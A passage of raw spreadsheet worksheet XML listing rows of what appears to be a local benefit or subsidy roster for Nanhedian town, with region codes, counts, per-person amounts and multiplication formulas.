      <c r="E2439" s="16" t="s">
        <v>6422</v>
      </c>
      <c r="F2439" s="17" t="str">
        <f>F2438</f>
        <v>4113211003</v>
      </c>
      <c r="G2439" s="17"/>
      <c r="H2439" s="17"/>
      <c r="I2439" s="17"/>
      <c r="J2439" s="17"/>
      <c r="K2439" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2440" customHeight="1" spans="1:11">
      <c r="A2440" s="16" t="s">
        <v>6423</v>
      </c>
      <c r="B2440" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2440" s="17" t="s">
        <v>6424</v>
      </c>
      <c r="D2440" s="17" t="s">
        <v>6425</v>
      </c>
      <c r="E2440" s="17" t="s">
        <v>6426</v>
      </c>
      <c r="F2440" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2440" s="17">
        <v>1</v>
      </c>
      <c r="H2440" s="18">
        <v>365</v>
      </c>
      <c r="I2440" s="17">
        <f t="shared" ref="I2440:I2447" si="117">H2440*G2440</f>
        <v>365</v>
      </c>
      <c r="J2440" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2440" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2441" customHeight="1" spans="1:11">
      <c r="A2441" s="16" t="s">
        <v>6427</v>
      </c>
      <c r="B2441" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2441" s="17" t="s">
        <v>6424</v>
      </c>
      <c r="D2441" s="17" t="s">
        <v>6428</v>
      </c>
      <c r="E2441" s="17" t="s">
        <v>6309</v>
      </c>
      <c r="F2441" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2441" s="17">
        <v>1</v>
      </c>
      <c r="H2441" s="18">
        <v>365</v>
      </c>
      <c r="I2441" s="17">
        <f t="shared" si="117"/>
        <v>365</v>
      </c>
      <c r="J2441" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2441" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2442" customHeight="1" spans="1:11">
      <c r="A2442" s="16" t="s">
        <v>6429</v>
      </c>
      <c r="B2442" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2442" s="17" t="s">
        <v>6424</v>
      </c>
      <c r="D2442" s="17" t="s">
        <v>6430</v>
      </c>
      <c r="E2442" s="17" t="s">
        <v>6431</v>
      </c>
      <c r="F2442" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2442" s="17">
        <v>1</v>
      </c>
      <c r="H2442" s="18">
        <v>365</v>
      </c>
      <c r="I2442" s="17">
        <f t="shared" si="117"/>
        <v>365</v>
      </c>
      <c r="J2442" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2442" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2443" customHeight="1" spans="1:11">
      <c r="A2443" s="16" t="s">
        <v>6432</v>
      </c>
      <c r="B2443" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2443" s="17" t="s">
        <v>6424</v>
      </c>
      <c r="D2443" s="17" t="s">
        <v>6433</v>
      </c>
      <c r="E2443" s="17" t="s">
        <v>633</v>
      </c>
      <c r="F2443" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2443" s="17">
        <v>1</v>
      </c>
      <c r="H2443" s="18">
        <v>365</v>
      </c>
      <c r="I2443" s="17">
        <f t="shared" si="117"/>
        <v>365</v>
      </c>
      <c r="J2443" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2443" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2444" customHeight="1" spans="1:11">
      <c r="A2444" s="16" t="s">
        <v>6434</v>
      </c>
      <c r="B2444" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2444" s="17" t="s">
        <v>6424</v>
      </c>
      <c r="D2444" s="17" t="s">
        <v>6435</v>
      </c>
      <c r="E2444" s="17" t="s">
        <v>6387</v>
      </c>
      <c r="F2444" s="17" t="s">
        <v>6436</v>
      </c>
      <c r="G2444" s="17">
        <v>1</v>
      </c>
      <c r="H2444" s="18">
        <v>365</v>
      </c>
      <c r="I2444" s="17">
        <f t="shared" si="117"/>
        <v>365</v>
      </c>
      <c r="J2444" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2444" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2445" customHeight="1" spans="1:11">
      <c r="A2445" s="16" t="s">
        <v>6437</v>
      </c>
      <c r="B2445" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2445" s="17" t="s">
        <v>6424</v>
      </c>
      <c r="D2445" s="17" t="s">
        <v>6438</v>
      </c>
      <c r="E2445" s="17" t="s">
        <v>6439</v>
      </c>
      <c r="F2445" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2445" s="17">
        <v>1</v>
      </c>
      <c r="H2445" s="18">
        <v>365</v>
      </c>
      <c r="I2445" s="17">
        <f t="shared" si="117"/>
        <v>365</v>
      </c>
      <c r="J2445" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2445" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2446" customHeight="1" spans="1:11">
      <c r="A2446" s="16" t="s">
        <v>6440</v>
      </c>
      <c r="B2446" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2446" s="17" t="s">
        <v>6424</v>
      </c>
      <c r="D2446" s="17" t="s">
        <v>6441</v>
      </c>
      <c r="E2446" s="17" t="s">
        <v>6442</v>
      </c>
      <c r="F2446" s="17" t="s">
        <v>6443</v>
      </c>
      <c r="G2446" s="17">
        <v>1</v>
      </c>
      <c r="H2446" s="18">
        <v>365</v>
      </c>
      <c r="I2446" s="17">
        <f t="shared" si="117"/>
        <v>365</v>
      </c>
      <c r="J2446" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2446" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2447" customHeight="1" spans="1:11">
      <c r="A2447" s="16" t="s">
        <v>6444</v>
      </c>
      <c r="B2447" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2447" s="17" t="s">
        <v>5377</v>
      </c>
      <c r="D2447" s="17" t="s">
        <v>6445</v>
      </c>
      <c r="E2447" s="17" t="s">
        <v>6446</v>
      </c>
      <c r="F2447" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2447" s="17">
        <v>2</v>
      </c>
      <c r="H2447" s="18">
        <v>325</v>
      </c>
      <c r="I2447" s="17">
        <f t="shared" si="117"/>
        <v>650</v>
      </c>
      <c r="J2447" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2447" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2448" customHeight="1" spans="1:11">
      <c r="A2448" s="16" t="s">
        <v>6447</v>
      </c>
      <c r="B2448" s="17" t="str">
        <f>B2447</f>
        <v>南河店镇</v>
      </c>
      <c r="C2448" s="17" t="str">
        <f>C2447</f>
        <v>县社</v>
      </c>
      <c r="D2448" s="24" t="s">
        <v>6448</v>
      </c>
      <c r="E2448" s="24" t="s">
        <v>6449</v>
      </c>
      <c r="F2448" s="17" t="str">
        <f>F2447</f>
        <v>4113211004</v>
      </c>
      <c r="G2448" s="17"/>
      <c r="H2448" s="17"/>
      <c r="I2448" s="17"/>
      <c r="J2448" s="17"/>
      <c r="K2448" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2449" customHeight="1" spans="1:11">
      <c r="A2449" s="16" t="s">
        <v>6450</v>
      </c>
      <c r="B2449" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2449" s="17" t="s">
        <v>5377</v>
      </c>
      <c r="D2449" s="17" t="s">
        <v>2889</v>
      </c>
      <c r="E2449" s="17" t="s">
        <v>6451</v>
      </c>
      <c r="F2449" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2449" s="17">
        <v>1</v>
      </c>
      <c r="H2449" s="18">
        <v>365</v>
      </c>
      <c r="I2449" s="17">
        <f>H2449*G2449</f>
        <v>365</v>
      </c>
      <c r="J2449" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2449" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2450" customHeight="1" spans="1:11">
      <c r="A2450" s="16" t="s">
        <v>6452</v>
      </c>
      <c r="B2450" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2450" s="17" t="s">
        <v>5377</v>
      </c>
      <c r="D2450" s="17" t="s">
        <v>6453</v>
      </c>
      <c r="E2450" s="17" t="s">
        <v>6387</v>
      </c>
      <c r="F2450" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2450" s="17">
        <v>3</v>
      </c>
      <c r="H2450" s="18">
        <v>290</v>
      </c>
      <c r="I2450" s="17">
        <f>H2450*G2450</f>
        <v>870</v>
      </c>
      <c r="J2450" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2450" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2451" customHeight="1" spans="1:11">
      <c r="A2451" s="16" t="s">
        <v>6454</v>
      </c>
      <c r="B2451" s="17" t="str">
        <f>B2450</f>
        <v>南河店镇</v>
      </c>
      <c r="C2451" s="17" t="str">
        <f>C2450</f>
        <v>县社</v>
      </c>
      <c r="D2451" s="24" t="s">
        <v>6455</v>
      </c>
      <c r="E2451" s="24" t="s">
        <v>1258</v>
      </c>
      <c r="F2451" s="17" t="str">
        <f>F2450</f>
        <v>4113211004</v>
      </c>
      <c r="G2451" s="17"/>
      <c r="H2451" s="17"/>
      <c r="I2451" s="17"/>
      <c r="J2451" s="17"/>
      <c r="K2451" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2452" customHeight="1" spans="1:11">
      <c r="A2452" s="16" t="s">
        <v>6456</v>
      </c>
      <c r="B2452" s="17" t="str">
        <f>B2451</f>
        <v>南河店镇</v>
      </c>
      <c r="C2452" s="17" t="str">
        <f>C2451</f>
        <v>县社</v>
      </c>
      <c r="D2452" s="24" t="s">
        <v>6457</v>
      </c>
      <c r="E2452" s="24" t="s">
        <v>6458</v>
      </c>
      <c r="F2452" s="17" t="str">
        <f>F2451</f>
        <v>4113211004</v>
      </c>
      <c r="G2452" s="17"/>
      <c r="H2452" s="17"/>
      <c r="I2452" s="17"/>
      <c r="J2452" s="17"/>
      <c r="K2452" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2453" customHeight="1" spans="1:11">
      <c r="A2453" s="16" t="s">
        <v>6459</v>
      </c>
      <c r="B2453" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2453" s="17" t="s">
        <v>5377</v>
      </c>
      <c r="D2453" s="17" t="s">
        <v>6460</v>
      </c>
      <c r="E2453" s="17" t="s">
        <v>6461</v>
      </c>
      <c r="F2453" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2453" s="17">
        <v>1</v>
      </c>
      <c r="H2453" s="18">
        <v>365</v>
      </c>
      <c r="I2453" s="17">
        <f t="shared" ref="I2453:I2460" si="118">H2453*G2453</f>
        <v>365</v>
      </c>
      <c r="J2453" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2453" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2454" customHeight="1" spans="1:11">
      <c r="A2454" s="16" t="s">
        <v>6462</v>
      </c>
      <c r="B2454" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2454" s="17" t="s">
        <v>5377</v>
      </c>
      <c r="D2454" s="17" t="s">
        <v>6463</v>
      </c>
      <c r="E2454" s="17" t="s">
        <v>6464</v>
      </c>
      <c r="F2454" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2454" s="17">
        <v>1</v>
      </c>
      <c r="H2454" s="18">
        <v>365</v>
      </c>
      <c r="I2454" s="17">
        <f t="shared" si="118"/>
        <v>365</v>
      </c>
      <c r="J2454" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2454" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2455" customHeight="1" spans="1:11">
      <c r="A2455" s="16" t="s">
        <v>6465</v>
      </c>
      <c r="B2455" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2455" s="17" t="s">
        <v>5377</v>
      </c>
      <c r="D2455" s="17" t="s">
        <v>6466</v>
      </c>
      <c r="E2455" s="17" t="s">
        <v>6467</v>
      </c>
      <c r="F2455" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2455" s="17">
        <v>1</v>
      </c>
      <c r="H2455" s="18">
        <v>365</v>
      </c>
      <c r="I2455" s="17">
        <f t="shared" si="118"/>
        <v>365</v>
      </c>
      <c r="J2455" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2455" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2456" customHeight="1" spans="1:11">
      <c r="A2456" s="16" t="s">
        <v>6468</v>
      </c>
      <c r="B2456" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2456" s="17" t="s">
        <v>5377</v>
      </c>
      <c r="D2456" s="17" t="s">
        <v>6469</v>
      </c>
      <c r="E2456" s="17" t="s">
        <v>2755</v>
      </c>
      <c r="F2456" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2456" s="17">
        <v>1</v>
      </c>
      <c r="H2456" s="18">
        <v>365</v>
      </c>
      <c r="I2456" s="17">
        <f t="shared" si="118"/>
        <v>365</v>
      </c>
      <c r="J2456" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2456" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2457" customHeight="1" spans="1:11">
      <c r="A2457" s="16" t="s">
        <v>6470</v>
      </c>
      <c r="B2457" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2457" s="17" t="s">
        <v>5377</v>
      </c>
      <c r="D2457" s="17" t="s">
        <v>6471</v>
      </c>
      <c r="E2457" s="17" t="s">
        <v>6472</v>
      </c>
      <c r="F2457" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2457" s="17">
        <v>1</v>
      </c>
      <c r="H2457" s="18">
        <v>365</v>
      </c>
      <c r="I2457" s="17">
        <f t="shared" si="118"/>
        <v>365</v>
      </c>
      <c r="J2457" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2457" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2458" customHeight="1" spans="1:11">
      <c r="A2458" s="16" t="s">
        <v>6473</v>
      </c>
      <c r="B2458" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2458" s="17" t="s">
        <v>5377</v>
      </c>
      <c r="D2458" s="17" t="s">
        <v>6474</v>
      </c>
      <c r="E2458" s="17" t="s">
        <v>6475</v>
      </c>
      <c r="F2458" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2458" s="17">
        <v>1</v>
      </c>
      <c r="H2458" s="18">
        <v>365</v>
      </c>
      <c r="I2458" s="17">
        <f t="shared" si="118"/>
        <v>365</v>
      </c>
      <c r="J2458" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2458" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2459" customHeight="1" spans="1:11">
      <c r="A2459" s="16" t="s">
        <v>6476</v>
      </c>
      <c r="B2459" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2459" s="17" t="s">
        <v>5377</v>
      </c>
      <c r="D2459" s="17" t="s">
        <v>6477</v>
      </c>
      <c r="E2459" s="17" t="s">
        <v>6478</v>
      </c>
      <c r="F2459" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2459" s="17">
        <v>1</v>
      </c>
      <c r="H2459" s="18">
        <v>365</v>
      </c>
      <c r="I2459" s="17">
        <f t="shared" si="118"/>
        <v>365</v>
      </c>
      <c r="J2459" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2459" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2460" customHeight="1" spans="1:11">
      <c r="A2460" s="16" t="s">
        <v>6479</v>
      </c>
      <c r="B2460" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2460" s="17" t="s">
        <v>5377</v>
      </c>
      <c r="D2460" s="17" t="s">
        <v>6480</v>
      </c>
      <c r="E2460" s="17" t="s">
        <v>6475</v>
      </c>
      <c r="F2460" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2460" s="17">
        <v>2</v>
      </c>
      <c r="H2460" s="18">
        <v>325</v>
      </c>
      <c r="I2460" s="17">
        <f t="shared" si="118"/>
        <v>650</v>
      </c>
      <c r="J2460" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2460" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2461" customHeight="1" spans="1:11">
      <c r="A2461" s="16" t="s">
        <v>6481</v>
      </c>
      <c r="B2461" s="17" t="str">
        <f>B2460</f>
        <v>南河店镇</v>
      </c>
      <c r="C2461" s="17" t="str">
        <f>C2460</f>
        <v>县社</v>
      </c>
      <c r="D2461" s="23" t="s">
        <v>6482</v>
      </c>
      <c r="E2461" s="23" t="s">
        <v>6483</v>
      </c>
      <c r="F2461" s="17" t="str">
        <f>F2460</f>
        <v>4113211004</v>
      </c>
      <c r="G2461" s="17"/>
      <c r="H2461" s="17"/>
      <c r="I2461" s="17"/>
      <c r="J2461" s="17"/>
      <c r="K2461" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2462" customHeight="1" spans="1:11">
      <c r="A2462" s="16" t="s">
        <v>6484</v>
      </c>
      <c r="B2462" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2462" s="17" t="s">
        <v>5377</v>
      </c>
      <c r="D2462" s="17" t="s">
        <v>6485</v>
      </c>
      <c r="E2462" s="17" t="s">
        <v>2636</v>
      </c>
      <c r="F2462" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2462" s="17">
        <v>1</v>
      </c>
      <c r="H2462" s="18">
        <v>365</v>
      </c>
      <c r="I2462" s="17">
        <f t="shared" ref="I2462:I2468" si="119">H2462*G2462</f>
        <v>365</v>
      </c>
      <c r="J2462" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2462" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2463" customHeight="1" spans="1:11">
      <c r="A2463" s="16" t="s">
        <v>6486</v>
      </c>
      <c r="B2463" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2463" s="17" t="s">
        <v>6424</v>
      </c>
      <c r="D2463" s="17" t="s">
        <v>6487</v>
      </c>
      <c r="E2463" s="17" t="s">
        <v>6488</v>
      </c>
      <c r="F2463" s="17" t="s">
        <v>6489</v>
      </c>
      <c r="G2463" s="17">
        <v>1</v>
      </c>
      <c r="H2463" s="18">
        <v>365</v>
      </c>
      <c r="I2463" s="17">
        <f t="shared" si="119"/>
        <v>365</v>
      </c>
      <c r="J2463" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2463" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2464" customHeight="1" spans="1:11">
      <c r="A2464" s="16" t="s">
        <v>6490</v>
      </c>
      <c r="B2464" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2464" s="17" t="s">
        <v>6424</v>
      </c>
      <c r="D2464" s="17" t="s">
        <v>6491</v>
      </c>
      <c r="E2464" s="17" t="s">
        <v>6492</v>
      </c>
      <c r="F2464" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2464" s="17">
        <v>1</v>
      </c>
      <c r="H2464" s="18">
        <v>365</v>
      </c>
      <c r="I2464" s="17">
        <f t="shared" si="119"/>
        <v>365</v>
      </c>
      <c r="J2464" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2464" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2465" customHeight="1" spans="1:11">
      <c r="A2465" s="16" t="s">
        <v>6493</v>
      </c>
      <c r="B2465" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2465" s="17" t="s">
        <v>6424</v>
      </c>
      <c r="D2465" s="17" t="s">
        <v>6494</v>
      </c>
      <c r="E2465" s="17" t="s">
        <v>6439</v>
      </c>
      <c r="F2465" s="17" t="s">
        <v>6364</v>
      </c>
      <c r="G2465" s="17">
        <v>1</v>
      </c>
      <c r="H2465" s="18">
        <v>365</v>
      </c>
      <c r="I2465" s="17">
        <f t="shared" si="119"/>
        <v>365</v>
      </c>
      <c r="J2465" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2465" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2466" customHeight="1" spans="1:11">
      <c r="A2466" s="16" t="s">
        <v>6495</v>
      </c>
      <c r="B2466" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2466" s="17" t="s">
        <v>6496</v>
      </c>
      <c r="D2466" s="17" t="s">
        <v>6497</v>
      </c>
      <c r="E2466" s="17" t="s">
        <v>3889</v>
      </c>
      <c r="F2466" s="17" t="s">
        <v>6498</v>
      </c>
      <c r="G2466" s="17">
        <v>1</v>
      </c>
      <c r="H2466" s="18">
        <v>365</v>
      </c>
      <c r="I2466" s="17">
        <f t="shared" si="119"/>
        <v>365</v>
      </c>
      <c r="J2466" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2466" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2467" customHeight="1" spans="1:11">
      <c r="A2467" s="16" t="s">
        <v>6499</v>
      </c>
      <c r="B2467" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2467" s="17" t="s">
        <v>3457</v>
      </c>
      <c r="D2467" s="17" t="s">
        <v>6500</v>
      </c>
      <c r="E2467" s="17" t="s">
        <v>3068</v>
      </c>
      <c r="F2467" s="17" t="s">
        <v>6443</v>
      </c>
      <c r="G2467" s="17">
        <v>1</v>
      </c>
      <c r="H2467" s="18">
        <v>365</v>
      </c>
      <c r="I2467" s="17">
        <f t="shared" si="119"/>
        <v>365</v>
      </c>
      <c r="J2467" s="17" t="s">
        <v>6501</v>
      </c>
      <c r="K2467" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2468" customHeight="1" spans="1:11">
      <c r="A2468" s="16" t="s">
        <v>6502</v>
      </c>
      <c r="B2468" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2468" s="17" t="s">
        <v>3448</v>
      </c>
      <c r="D2468" s="17" t="s">
        <v>6503</v>
      </c>
      <c r="E2468" s="17" t="s">
        <v>1871</v>
      </c>
      <c r="F2468" s="17" t="s">
        <v>6443</v>
      </c>
      <c r="G2468" s="17">
        <v>3</v>
      </c>
      <c r="H2468" s="18">
        <v>290</v>
      </c>
      <c r="I2468" s="17">
        <f t="shared" si="119"/>
        <v>870</v>
      </c>
      <c r="J2468" s="17" t="s">
        <v>4642</v>
      </c>
      <c r="K2468" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2469" customHeight="1" spans="1:11">
      <c r="A2469" s="16" t="s">
        <v>6504</v>
      </c>
      <c r="B2469" s="17" t="str">
        <f>B2468</f>
        <v>南河店镇</v>
      </c>
      <c r="C2469" s="17" t="str">
        <f>C2468</f>
        <v>供销社</v>
      </c>
      <c r="D2469" s="34" t="s">
        <v>6505</v>
      </c>
      <c r="E2469" s="90" t="s">
        <v>6506</v>
      </c>
      <c r="F2469" s="17" t="str">
        <f>F2468</f>
        <v>4113211020</v>
      </c>
      <c r="G2469" s="17"/>
      <c r="H2469" s="17"/>
      <c r="I2469" s="17"/>
      <c r="J2469" s="17"/>
      <c r="K2469" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2470" customHeight="1" spans="1:11">
      <c r="A2470" s="16" t="s">
        <v>6507</v>
      </c>
      <c r="B2470" s="17" t="str">
        <f>B2469</f>
        <v>南河店镇</v>
      </c>
      <c r="C2470" s="17" t="str">
        <f>C2469</f>
        <v>供销社</v>
      </c>
      <c r="D2470" s="90" t="s">
        <v>6508</v>
      </c>
      <c r="E2470" s="90" t="s">
        <v>6509</v>
      </c>
      <c r="F2470" s="17" t="str">
        <f>F2469</f>
        <v>4113211020</v>
      </c>
      <c r="G2470" s="17"/>
      <c r="H2470" s="17"/>
      <c r="I2470" s="17"/>
      <c r="J2470" s="17"/>
      <c r="K2470" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2471" customHeight="1" spans="1:11">
      <c r="A2471" s="16" t="s">
        <v>6510</v>
      </c>
      <c r="B2471" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2471" s="17" t="s">
        <v>6511</v>
      </c>
      <c r="D2471" s="17" t="s">
        <v>6512</v>
      </c>
      <c r="E2471" s="17" t="s">
        <v>6404</v>
      </c>
      <c r="F2471" s="17" t="s">
        <v>6346</v>
      </c>
      <c r="G2471" s="17">
        <v>1</v>
      </c>
      <c r="H2471" s="18">
        <v>365</v>
      </c>
      <c r="I2471" s="17">
        <f>H2471*G2471</f>
        <v>365</v>
      </c>
      <c r="J2471" s="17" t="s">
        <v>4599</v>
      </c>
      <c r="K2471" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2472" customHeight="1" spans="1:11">
      <c r="A2472" s="16" t="s">
        <v>6513</v>
      </c>
      <c r="B2472" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2472" s="17" t="s">
        <v>3436</v>
      </c>
      <c r="D2472" s="17" t="s">
        <v>6514</v>
      </c>
      <c r="E2472" s="17" t="s">
        <v>6404</v>
      </c>
      <c r="F2472" s="17" t="s">
        <v>6443</v>
      </c>
      <c r="G2472" s="17">
        <v>1</v>
      </c>
      <c r="H2472" s="18">
        <v>365</v>
      </c>
      <c r="I2472" s="17">
        <f>H2472*G2472</f>
        <v>365</v>
      </c>
      <c r="J2472" s="17" t="s">
        <v>4667</v>
      </c>
      <c r="K2472" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2473" customHeight="1" spans="1:11">
      <c r="A2473" s="16" t="s">
        <v>6515</v>
      </c>
      <c r="B2473" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2473" s="17" t="s">
        <v>6516</v>
      </c>
      <c r="D2473" s="17" t="s">
        <v>6517</v>
      </c>
      <c r="E2473" s="17" t="s">
        <v>6451</v>
      </c>
      <c r="F2473" s="17" t="s">
        <v>6443</v>
      </c>
      <c r="G2473" s="17">
        <v>1</v>
      </c>
      <c r="H2473" s="18">
        <v>365</v>
      </c>
      <c r="I2473" s="17">
        <f>H2473*G2473</f>
        <v>365</v>
      </c>
      <c r="J2473" s="17" t="s">
        <v>4681</v>
      </c>
      <c r="K2473" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2474" customHeight="1" spans="1:11">
      <c r="A2474" s="16" t="s">
        <v>6518</v>
      </c>
      <c r="B2474" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2474" s="17" t="s">
        <v>5377</v>
      </c>
      <c r="D2474" s="17" t="s">
        <v>6519</v>
      </c>
      <c r="E2474" s="17" t="s">
        <v>6520</v>
      </c>
      <c r="F2474" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2474" s="17">
        <v>1</v>
      </c>
      <c r="H2474" s="18">
        <v>365</v>
      </c>
      <c r="I2474" s="17">
        <f>H2474*G2474</f>
        <v>365</v>
      </c>
      <c r="J2474" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2474" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2475" customHeight="1" spans="1:11">
      <c r="A2475" s="16" t="s">
        <v>6521</v>
      </c>
      <c r="B2475" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2475" s="17" t="s">
        <v>6522</v>
      </c>
      <c r="D2475" s="17" t="s">
        <v>6523</v>
      </c>
      <c r="E2475" s="17" t="s">
        <v>6524</v>
      </c>
      <c r="F2475" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2475" s="17">
        <v>2</v>
      </c>
      <c r="H2475" s="18">
        <v>325</v>
      </c>
      <c r="I2475" s="17">
        <f>H2475*G2475</f>
        <v>650</v>
      </c>
      <c r="J2475" s="29">
        <v>45474</v>
      </c>
      <c r="K2475" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2476" customHeight="1" spans="1:11">
      <c r="A2476" s="16" t="s">
        <v>6525</v>
      </c>
      <c r="B2476" s="17" t="str">
        <f>B2475</f>
        <v>南河店镇</v>
      </c>
      <c r="C2476" s="17" t="str">
        <f>C2475</f>
        <v>南河店镇范庄村</v>
      </c>
      <c r="D2476" s="25" t="s">
        <v>6526</v>
      </c>
      <c r="E2476" s="25" t="s">
        <v>6527</v>
      </c>
      <c r="F2476" s="17" t="str">
        <f>F2475</f>
        <v>4113211004</v>
      </c>
      <c r="G2476" s="17"/>
      <c r="H2476" s="17"/>
      <c r="I2476" s="17"/>
      <c r="J2476" s="29"/>
      <c r="K2476" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2477" customHeight="1" spans="1:11">
      <c r="A2477" s="16" t="s">
        <v>6528</v>
      </c>
      <c r="B2477" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2477" s="17" t="s">
        <v>6529</v>
      </c>
      <c r="D2477" s="17" t="s">
        <v>6530</v>
      </c>
      <c r="E2477" s="17" t="s">
        <v>6531</v>
      </c>
      <c r="F2477" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2477" s="17">
        <v>1</v>
      </c>
      <c r="H2477" s="18">
        <v>365</v>
      </c>
      <c r="I2477" s="17">
        <f t="shared" ref="I2477:I2482" si="120">H2477*G2477</f>
        <v>365</v>
      </c>
      <c r="J2477" s="29">
        <v>45717</v>
      </c>
      <c r="K2477" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2478" customHeight="1" spans="1:11">
      <c r="A2478" s="16" t="s">
        <v>6532</v>
      </c>
      <c r="B2478" s="91" t="s">
        <v>6343</v>
      </c>
      <c r="C2478" s="91" t="s">
        <v>6529</v>
      </c>
